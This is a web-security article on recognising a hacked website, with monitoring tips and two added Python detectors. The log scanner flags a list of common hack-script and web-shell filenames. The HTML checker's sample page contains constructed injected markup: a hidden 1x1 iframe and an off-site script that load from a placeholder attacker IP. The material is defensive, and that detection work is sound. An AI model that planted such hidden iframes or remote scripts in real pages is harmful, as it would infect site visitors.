25 Years of Programming
An open source source for C, C++, OWL, BASIC, MDB, XLS, DOT, and more...
How to know if your website has been hacked

This article is part of a set that begins at: Warning signs that your website has malware

1) Google says "This site may harm your computer"

If Google or Yahoo! search engine result pages (SERPs) display a warning about your site, the most common cause is that your site was hacked. Please see the separate article about how to investigate and remove the Google / StopBadware warning message.

2) Visitors report getting viruses from your web pages

If visitors report to you that they get virus alerts or viruses from browsing your pages, your site is most likely hacked. Google and Yahoo! will start displaying a "badware" warning about your site soon, so see the article about it, above.

It is, however, possible for your pages to deliver viruses even if your site hasn't been hacked. This can occur when your pages pull some of their content from third parties such as advertisers, and they got hacked or someone slipped a malicious advertisement into their lineup. That scenario is also discussed in the article above.

3) Visitors report being redirected to other websites

If people try to visit your website but wind up somewhere else instead, it's another sign your site is hacked. It's a similar situation to the two described above and will eventually earn a Google or Yahoo! "badware flag". See the article referenced above.

4) Your traffic decreases dramatically and suddenly

Most web surfers heed the "This site may harm your computer" warning and stay away. Those who continue to the site and get a virus or virus alert will leave immediately and not browse around. Either way, you'll see a drop in traffic. Anytime your traffic drops suddenly, investigate.

Places where you can monitor your site status

An important aspect of monitoring your site is to notice unusual changes, things that are different from normal, so make a habit of paying attention now to what is normal and usual, while your site is not hacked.
1) Each time you log into cPanel

Make a habit of checking the "Last login from:" box to make sure it shows your IP address from the last time you logged in.

2) Google Webmaster Central > Webmaster Tools

Google account (free) and login required. Google notifies you in Webmaster Tools if your site gets flagged as harmful. They often notify you by email, too, if they have your email address. You can also check your Google status anytime by typing this in a Google search box and viewing the results: site:yourdomain.com

3) Google Safe Browsing Diagnostic database

Warning messages in Google search results are based on a Google database. You can view an up-to-date report from the database for any website by entering this URL in your browser address bar. Replace EXAMPLE.COM with the address of the website you want to check:

http://www.google.com/safebrowsing/diagnostic?site=EXAMPLE.COM

I wrote a few paragraphs about how to interpret the diagnostic report here.

4) StopBadware.org Clearinghouse database

If your site is flagged, you'll find a short summary of badware behavior found.

5) Norton Safe Web, from Symantec

Reports the threats, categorized by type, that have been found on websites. You can go directly to the report for any site with this address (replace EXAMPLE.COM):

http://safeweb.norton.com/report/show?url=EXAMPLE.COM

6) McAfee SiteAdvisor safety and outlink reports

The report describes how many emails they received after registering at a site, how spammy the emails were, whether the site has outlinks to bad websites, and whether they found viruses or spyware on pages or in downloads. Users sometimes post public comments with complaints or praise. SiteAdvisor is a way to learn what others think of your site. It doesn't seem to be updated very often, however, so it's not an early warning system.

7) W3C HTML Validator

If your pages usually validate ok, but suddenly stop validating, it can be a sign that new code was inserted at invalid locations in your files.
The reported validation errors might be at exactly the locations where the injected code is.

8) Search engine result pages (SERPs)

At each of the popular search engines, watch for:
9) When you browse your own site

Always use an up-to-date antivirus and antispyware program on your own PC so you'll be alerted if your website starts distributing malware. Use "real-time" scanning protection, which will catch malicious files as soon as they are received. An on-demand scanner (such as a free online scanner, or a once-a-day manual scan) isn't enough. By the time you identify and quarantine the virus, the damage it was intended to cause might already be done.

Use your browser's View Source feature occasionally to inspect your page's HTML code for text injections of invisible iframes, JavaScript, and links to malicious websites. These are often the definitive indicators that the pages have been tampered with. The "badware investigation" article referenced above shows examples of what these things look like. They're just text. Once you know what to look for, they're easy to find.

It's a good idea also to check a few files on your server from time to time. Open your home page in your control panel's File Manager and inspect the HTML for the signs of tampering described above. Whenever you are viewing a list of the files on your server (such as in cPanel > File Manager or by FTP), be alert for file names you don't recognize or sizes that are obviously wrong (such as a size of 0 for a file you know should be bigger). The files on your server should never be different from what they were when you originally uploaded them. A file getting modified on your server without your permission is not normal. If it happens at all, it is an indication that something is wrong.

10) HTTP access log

This log records the requests for pages and other files from your site. If there are successful requests (HTTP result code 200) for files you didn't put on the site, it's suspicious. It's even more suspicious if the filenames are variations of these often-used names for hack scripts: id.txt, cmd.txt, safe.txt, r57.txt, test.txt, echo.txt, php.txt, load.txt, or mic.txt.
Don't panic just because you find mentions of those filenames. You probably will find them. It matters where the names appear. Here are two different types of requests:
As demonstrated in example 1, your access log is the place to learn how your site is being attacked, whether successfully or not, so you can learn what things you need to defend against. Near-misses are good to learn from. If you find an attack that did not succeed in doing harm but did return a result code of 200 (meaning the server accepted the request and sent a file), it is a good idea to determine the malicious feature of the attack code and revise your .htaccess to block those types of requests. The goal should be for every known type of attack to get a 403 Forbidden result instead of 200. That will mean that your server rejected the request "at the front door", and the attack never had the opportunity to do harm. The Website Security article linked at the top of this page has some specific methods for this type of request blocking.

Your HTTP and FTP access logs (see the next section) are usually available for download at cPanel > Raw Log Manager. The log files are usually stored outside public_html, sometimes in a folder called /logs, which you can find with cPanel > File Manager or with FTP.

11) FTP access log

Unauthorized users, IP addresses, or file transfers in your FTP log are proof that your site is compromised.

Questions are welcome in the discussion forum.
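The access-log review described in section 10, as an added example that is not part of the original article: it parses Apache/cPanel-style log lines, flags HTTP 200 responses for files you never uploaded, and flags any request that mentions one of the hack-script filenames listed above. The log lines and the list of legitimate site files are constructed for illustration.

```python
"""Scan HTTP access log lines for the two signs the article describes:
200 responses for files you did not upload, and requests that mention
well-known hack-script names (wherever in the URL they appear).
Added example; sample log lines and KNOWN_FILES are constructed."""
import re
from urllib.parse import urlsplit, unquote

# Filenames the article lists as often-used names for hack scripts.
HACK_SCRIPT_NAMES = {"id.txt", "cmd.txt", "safe.txt", "r57.txt", "test.txt",
                     "echo.txt", "php.txt", "load.txt", "mic.txt"}

# Apache "combined" format: host ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    """Fields we care about, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_names_in(target):
    """Hack-script names appearing anywhere in the (percent-decoded) URL."""
    text = unquote(target).lower()
    return sorted(n for n in HACK_SCRIPT_NAMES if n in text)

def scan_log(lines, known_files):
    """Yield the parsed fields plus a 'reasons' list for each line worth a look.
    known_files: set of paths (e.g. '/index.html') that you uploaded yourself."""
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        reasons = []
        path = urlsplit(f["target"]).path
        if f["status"] == "200" and path not in known_files:
            reasons.append("HTTP 200 for a file you did not upload: " + path)
        names = suspicious_names_in(f["target"])
        if names:
            reasons.append("mentions hack-script name(s): " + ", ".join(names))
        if reasons:
            yield dict(f, reasons=reasons)

# Constructed sample log (not from any real server): two normal hits, one
# probe for r57.txt that got a 404, and a 200 for a file never uploaded.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /images/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:58:01 +0000] "GET /r57.txt HTTP/1.1" 404 212 "-" "libwww-perl/5.8"
198.51.100.9 - - [10/Oct/2023:14:02:44 +0000] "GET /tmp/cmd.txt HTTP/1.1" 200 1337 "-" "libwww-perl/5.8"
"""
KNOWN_FILES = {"/index.html", "/images/logo.png"}

def find_suspicious(log_text=SAMPLE_LOG, known_files=KNOWN_FILES):
    return list(scan_log(log_text.splitlines(), known_files))

if __name__ == "__main__":
    for hit in find_suspicious():
        print(hit["ip"], hit["status"], hit["target"], "->", "; ".join(hit["reasons"]))
```

A 404 or 403 for one of those names is the "near-miss" the article describes; the 200 for /tmp/cmd.txt is the case that warrants checking the server's files immediately.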
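The View Source check described in section 9, as an added example that is not part of the original article: it walks a saved copy of a page's HTML and reports the injection patterns the article names, namely iframes sized or styled to be invisible, scripts loaded from another host, and hidden links to other sites. The sample HTML is constructed, and YOUR_HOST is a placeholder for your own domain.

```python
"""Flag the injected-text patterns the article tells you to look for when you
View Source. Added example; SAMPLE_HTML is constructed and YOUR_HOST is a
placeholder for the domain the page belongs to."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

YOUR_HOST = "example.com"   # placeholder: your own domain

def _is_hidden(attrs):
    """True when the element is sized or styled so a visitor would not see it."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width", "") in ("0", "1") or attrs.get("height", "") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style

def _foreign(url):
    """True for absolute URLs pointing at a host other than YOUR_HOST."""
    host = urlsplit(url).hostname
    return bool(host) and host != YOUR_HOST and not host.endswith("." + YOUR_HOST)

class InjectionFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (line number, tag, reason, url)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        line = self.getpos()[0]
        if tag == "iframe" and (_is_hidden(a) or _foreign(a.get("src", ""))):
            self.findings.append((line, tag, "hidden or off-site iframe", a.get("src", "")))
        elif tag == "script" and _foreign(a.get("src", "")):
            self.findings.append((line, tag, "script loaded from another host", a["src"]))
        elif tag == "a" and _is_hidden(a) and _foreign(a.get("href", "")):
            self.findings.append((line, tag, "hidden link to another site", a["href"]))

def find_injections(html):
    """Return the list of findings for one page's HTML source."""
    p = InjectionFinder()
    p.feed(html)
    return p.findings

# Constructed sample: a normal page with three injected lines (5, 6 and 7).
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<script src="/js/site.js"></script>
<a href="http://partner.example.org/">Our partner</a>
<iframe src="http://203.0.113.77/x.html" width="1" height="1"></iframe>
<script src="http://203.0.113.77/k.js"></script>
<a href="http://203.0.113.77/" style="display:none">cheap stuff</a>
</body></html>"""

if __name__ == "__main__":
    for line, tag, reason, url in find_injections(SAMPLE_HTML):
        print(f"line {line}: <{tag}> {reason}: {url}")
```

A visible link to another site (line 4 of the sample) is ordinary content and is deliberately not reported; the checks key on invisibility and off-site code loading, which is what distinguishes injected text from your own.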